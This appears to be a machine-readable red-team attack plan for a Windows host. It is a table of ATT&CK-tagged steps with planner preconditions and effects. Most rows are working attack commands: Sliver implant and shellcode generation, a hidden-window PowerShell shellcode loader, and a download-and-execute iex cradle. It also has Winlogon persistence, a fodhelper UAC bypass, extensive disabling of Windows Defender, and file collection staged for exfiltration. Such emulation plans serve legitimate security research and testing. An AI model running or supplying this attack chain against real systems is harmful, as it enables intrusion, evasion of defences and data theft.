- Machine ID: host11
- OS: windows
- CVE: []
| uuid | name | id | source | supported_platforms | tactics | technique | description | execution | arguments | preconditions | effects |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 2a602f8e-4d1f-49f1-b3b8-4b74f67cb63a | Build Shellcode for the Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a shellcode payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format shellcode --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(shellcode_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(bin_blob_file ?file - file)', '(file_prepared_local ?file - file)', ' |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| 0617285b-6005-4a73-83c5-d4dc86fcdc35 | Simulate the victim executes a shellcode payload (Windows) | ['T1059.001', 'T1620'] | Manual | ['windows'] | ['Execution', 'Defense Evasion'] | ['Command and Scripting Interpreter: PowerShell', 'Reflective Code Loading'] | None | {'executor': 'Human', 'command': '(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On victim's machine, open a powershell and execute these scripts)\n\n$s=[System.IO.File]::ReadAllBytes('#{SAVE_PATH}');\n$c='using System;using System.Runtime.InteropServices;public class W{[DllImport("kernel32")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);[DllImport("kernel32")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);[DllImport("kernel32")]public static extern uint WaitForSingleObject(IntPtr a,uint b);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);}';Add-Type -TypeDefinition $c;$hwnd=[W]::GetConsoleWindow();if($hwnd -ne [IntPtr]::Zero){[W]::ShowWindow($hwnd,0)};\n$p=[W]::VirtualAlloc(0,$s.Length,0x3000,0x40);\n[System.Runtime.InteropServices.Marshal]::Copy($s,0,$p,$s.Length);\n$h=[W]::CreateThread(0,0,$p,0,0,0);[W]::WaitForSingleObject($h,0xFFFFFFFF)\n'} | {'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded shellcode payload file', 'type': None}} | ['(file_exists ?path - path ?file - file ?t - host)', '(bin_blob_file ?file - file)'] | ['(file_executed ?file - file ?t - host)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 | Execute a Sliver Implant Payload | ['T1071.001'] | Sliver | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | Executing a Sliver implant payload will establish a Sliver session. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] | ['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 1f454dd6-e134-44df-bebb-67de70fb6cd8 | Basic Permission Groups Discovery Windows (Local) | ['T1069.001'] | ART | ['windows'] | ['Discovery'] | ['Permission Groups Discovery: Local Groups'] | Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. |
{'executor': 'Command Prompt Executor', 'command': 'net localgroup\nnet localgroup "Administrators"\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(os_windows ?target - host)'] | ['(local_permission_groups_info_known ?target - host)'] |
| f9c1197c-c5ef-4368-a10c-3a53003dbfbf | Remote Directory Listing | ['T1083'] | Sliver | ['windows', 'linux', 'macos'] | ['Discovery'] | ['File and Directory Discovery'] | The ls <remote path> command lists files and directories in a specified remote path or the current directory if no path is provided. By default, it sorts listings by name in ascending order, but can also sort by size or modified time, with options to reverse the order. The command includes flags for sorting, reversing order, and setting a timeout. |
{'executor': 'Sliver Executor', 'command': 'ls(#{SessionID})'} | {'SessionID': {'default': None, 'description': 'The session ID of the active Sliver connection.', 'type': None}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(file_info_known ?t - host)'] |
| 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 | WinPwn - PowerSharpPack - Seatbelt | ['T1082'] | ART | ['windows'] | ['Discovery'] | ['System Information Discovery'] | PowerSharpPack - Seatbelt technique via function of WinPwn. [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. |
{'executor': 'Powershell Executor', 'command': 'iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1\')\nInvoke-Seatbelt -Command "-group=all"'} | None | ['(powershell ?executor - executor ?target - host)', '(os_windows ?target - host)'] | ['(system_time_info_known ?target - host)'] |
| bc50eb97-4a6d-4a9d-b0b2-e9cf623a9106 | Build the executable file (service) of a Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a service executable payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format service --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(service_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(file_prepared_local ?file - file)', '(exe_file ?file - file)', ' |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| bf9f9d65-ee4d-4c3e-a843-777d04f19c38 | Winlogon Shell Key Persistence - PowerShell | ['T1547.004'] | ART | ['windows'] | ['Persistence', 'Privilege Escalation'] | ['Boot or Logon Autostart Execution: Winlogon Helper DLL'] | PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. |
{'executor': 'Powershell Executor', 'command': 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force\n'} | {'binary_to_execute': {'description': 'Path of binary to execute', 'type': 'path', 'default': 'C:\Windows\System32\cmd.exe'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(file_exists ?binary_to_execute - path ?file - file ?target - host)', '(exe_file ?file - file)'] | ['(file_execution_at_startup ?file - file ?target - host)'] |
| f7f31777-1bbf-4ddc-b7a1-af9f46a5299b | Obtain a persistent Sliver Executor | [None] | Manual | ['windows', 'linux', 'macos'] | ['Persistence'] | [None] | Obtain the persistency of Sliver Executor via scheduled payload file execution. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?target - host)', '(file_payload ?p - payload ?f - file)', {'operator': 'or', 'operands': ['(file_execution_at_time ?f - file ?target - host)', '(file_execution_at_startup ?f - file ?target - host)']}, '(unallocated ?s - executor)'] | ['(persistent_sliver_session ?s - executor ?target - host)', '~(unallocated ?s - executor)'] |
| 2e8f1a9c-0b5e-4a7c-b6d4-9a8b2d3c5f1e | Create Directory | ['T1106'] | Sliver | ['windows', 'linux'] | ['Persistence'] | ['File System Permissions Modification'] | The mkdir command creates a new directory on the target system. |
{'executor': 'Sliver Executor', 'command': 'mkdir (#{remote_path},#{SessionID})'} | {'remote_path': {'description': 'Full path of the directory to create'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?target - host)', '(os_linux ?target - host)']}, '(sliver_session ?executorID - executor ?target - host)'] | ['(dir_exists ?path - path ?dir - dir ?target - host)'] |
| a57fbe4b-3440-452a-88a7-943531ac872a | Zip a Folder with PowerShell for Staging in Temp | ['T1074.001'] | ART | ['windows'] | ['Collection'] | ['Data Staged: Local Data Staging'] | Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. |
{'executor': 'Powershell Executor', 'command': 'Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force\n'} | {'output_file': {'description': 'Location to save zipped file or folder', 'type': 'path', 'default': None}, 'input_file': {'description': 'Location of file or folder to zip', 'type': 'path', 'default': None}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(dir_exists ?input_file - path ?dir - dir ?target - host)'] | ['(dir_data_saved ?dir - dir ?file - file)', '(file_exists ?output_file - path ?file - file ?target - host)', '(zip_file ?file - file)'] |
| 3c898f62-626c-47d5-aad2-6de873d69153 | Windows Screencapture | ['T1113'] | ART | ['windows'] | ['Collection'] | ['Screen Capture'] | Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour |
{'executor': 'Powershell Executor', 'command': 'cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12\nAdd-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;\n[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);\ncmd /c "timeout 5 > NULL && psr.exe /stop"\n'} | {'output_file': {'description': 'Output file path', 'type': 'path', 'default': 'c:\temp\T1113_desktop.zip'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)'] | ['(screenshot_data_saved ?file - file ?target - host)', '(file_exists ?output_file - path ?file - file ?target - host)'] |
| d3d9af44-b8ad-4375-8b0a-4bff4b7e419c | Search files of interest and save them to a single zip file (Windows) | ['T1005'] | ART | ['windows'] | ['Collection'] | ['Data from Local System'] | This test searches for files of certain extensions and saves them to a single zip file prior to extraction. |
{'executor': 'Powershell Executor', 'command': '$startingDirectory = "C:"\n$outputZip = "#{output_zip_folder_path}"\n$fileExtensionsString = ".doc, .docx, .txt" \n$fileExtensions = $fileExtensionsString -split ", "\n\nNew-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null\n\nFunction Search-Files {\n param (\n [string]$directory\n )\n $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {\n $fileExtensions -contains $_.Extension.ToLower()\n }\n return $files\n}\n\n$foundFiles = Search-Files -directory $startingDirectory\nif ($foundFiles.Count -gt 0) {\n $foundFilePaths = $foundFiles.FullName\n Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"\n\n Write-Host "Zip file created: $outputZip\data.zip"\n } else {\n Write-Host "No files found with the specified extensions."\n }\n'} | {'output_zip_folder_path': {'description': 'Path to directory for saving the generated zip file', 'type': 'Path', 'default': 'PathToAtomicsFolder\..\ExternalPayloads\T1005'}} |
| 58f641ea-12e3-499a-b684-44dee46bd182 | Bypass UAC using Fodhelper | ['T1548.002'] | ART | ['windows'] | ['Defense Evasion', 'Privilege Escalation'] | ['Abuse Elevation Control Mechanism: Bypass User Account Control'] | Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. |
{'executor': 'Command Prompt Executor', 'command': 'reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f\nreg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f\nfodhelper.exe\n'} | {'executable_binary': {'description': 'Binary to execute with UAC Bypass', 'type': 'path', 'default': 'C:\Windows\System32\cmd.exe'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(file_exists ?executable_binary - path ?file - file ?target - host)', {'operator': 'or', 'operands': ['(exe_file ?file - file)']}] | ['(file_executed_as_root ?file - file ?target - host)'] |
| 19301991-c518-46ca-a622-378e1be4f1ad | Simulate the victim download and execute malicious payload file as Admin (Root) | ['T1204.002'] | Manual | ['windows'] | ['Execution'] | ['User Execution: Malicious File'] | None | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the target payload file\n3. Download the payload file\n4. Execute the payload file to #{PATH} as Admin (Root)\n"} | {'HOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)', '(exe_file ?file - file)', '(unallocated ?path - path)'] | ['(file_exists ?path - path ?file - file ?t - host)', '(file_executed ?file - file ?t - host)', '(file_executed_as_root ?f - file ?t - host)', '~(unallocated ?path - path)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 | Execute a Sliver Implant Payload | ['T1071.001'] | Sliver | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | Executing a Sliver implant payload will establish a Sliver session. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] | ['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 1f6743da-6ecc-4a93-b03f-dc357e4b313f | Tamper with Windows Defender Registry - Reg.exe | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe" |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul \nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(windows_defender_disabled ?target - host)'] |
| 2a78362e-b79a-4482-8e24-be397bce4d85 | Safe Mode Boot | ['T1562.009'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Safe Mode Boot'] | Allows adversaries to abuse safe mode to disable endpoint defenses that may not start with limited boot | {'executor': 'Elevated Command Prompt Executor', 'command': 'bcdedit /set safeboot network'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(endpoint_defense_disabled ?target - host)'] |
| 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 | Disable Windows Lock Workstation Feature | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(lock_workstation_disabled ?target - host)'] |
| 4b81bcfa-fb0a-45e9-90c2-e3efe5160140 | Disable Remote Desktop Security Settings Through Registry | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation |
{'executor': 'Command Prompt Executor', 'command': 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(os_windows ?target - host)'] | ['(rdp_security_settings_disabled ?target - host)'] |
| 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 | Remove Windows Defender Definition Files | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ |
{'executor': 'Elevated Command Prompt Executor', 'command': '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(anti_malware_disabled ?target - host)'] |
| 6e0d1131-2d7e-4905-8ca5-d6172f05d03d | Disable Windows Shutdown Button | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(shutdown_button_disabled ?target - host)'] |